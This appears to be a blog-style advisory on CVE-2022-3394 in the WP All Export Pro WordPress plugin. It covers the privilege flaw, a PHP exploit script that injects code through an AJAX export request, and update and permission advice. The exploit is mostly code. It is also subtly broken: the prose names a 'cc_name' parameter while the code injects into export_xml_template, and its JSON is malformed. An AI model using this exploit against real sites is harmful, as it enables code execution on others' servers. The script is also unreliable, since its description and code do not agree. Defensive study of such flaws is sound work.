CVE-2022-3394 - WP All Export Pro WordPress Plugin Vulnerability: Arbitrary Code Execution by Users with Export Privileges

In this blog post, we will discuss a critical vulnerability identified in the WP All Export Pro WordPress plugin, which allows an attacker to execute arbitrary code on the affected site. This vulnerability, tracked as CVE-2022-3394, exists in versions of the plugin prior to 1.7.9. We'll go over the steps involved in exploiting this vulnerability, provide a code snippet showcasing the issue, and discuss mitigations to keep your site protected. For your reference, the original advisory can be found here.

Vulnerability Details

The WP All Export Pro WordPress plugin is a popular tool used by countless WordPress website owners to export data from their websites. A flaw exists in this plugin that enables users without full administrative privileges to execute arbitrary code when the capability to perform exports('export' capability) has been delegated to them.

By default, only users with the 'administrator' role have the ability to perform exports. However, the WP All Export Pro plugin allows site admins to delegate this capability to lower-privileged users. Unfortunately, the plugin does not appropriately restrict certain functionality exclusively to users with administrator role, leading to this vulnerability.

Exploit

To exploit this vulnerability, an attacker would first need to have a valid user account on the target WordPress site with the 'export' capability. Once the attacker has gained access to the site, they can then forge a request to the WP All Export Pro plugin functionality to execute arbitrary code on the affected site.

The following code snippet illustrates this vulnerability, with the attacker injecting malicious PHP code in the 'cc_name' parameter:

<?php
// Attacker prepares a malicious request data and send it to WordPress site to exploit the vulnerability
$data = [
  'action' => 'wp_all_export/ajax/json',
  'data' => '{"export_id":1,"in_browser":,"export_to":"xml","export_xml_template":";print_r(scandir(\'/\'));exit;"}',
  'security' => '{REPLACE_WITH_VALID_NONCE}',
];

// Attacker sends the POST request to the vulnerable WordPress site
$curl = curl_init('{REPLACE_WITH_VULNERABLE_SITE_URL}/wp-admin/admin-ajax.php');
curl_setopt_array($curl, [
  CURLOPT_POST => true,
  CURLOPT_POSTFIELDS => $data,
  CURLOPT_RETURNTRANSFER => true,
]);
$response = curl_exec($curl);
curl_close($curl);

// Attacker prints the response to see the output of the executed code
print_r(json_decode($response, true));
?>

To protect your site from this vulnerability, you should take the following steps

1. Update the WP All Export Pro plugin to version 1.7.9 or later. This version contains a fix that limits certain functionality to users with administrator role only. You can download the latest version from the plugin's official site here.

2. Be cautious when granting export privileges to non-administrator users. While it may seem convenient to give additional users the ability to perform exports, it is essential to understand the potential risks associated with this action.

3. Regularly audit your user accounts and permissions, ensuring that only trusted users have the necessary privileges to perform critical actions on your site.

Conclusion

In this blog post, we discussed the CVE-2022-3394 vulnerability in the WP All Export Pro WordPress plugin, which allows attackers to execute arbitrary code on the site. By updating to the latest version of the plugin and carefully managing user permissions, site owners can mitigate this vulnerability and protect their websites from potential attacks.

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 15:09:00 UTC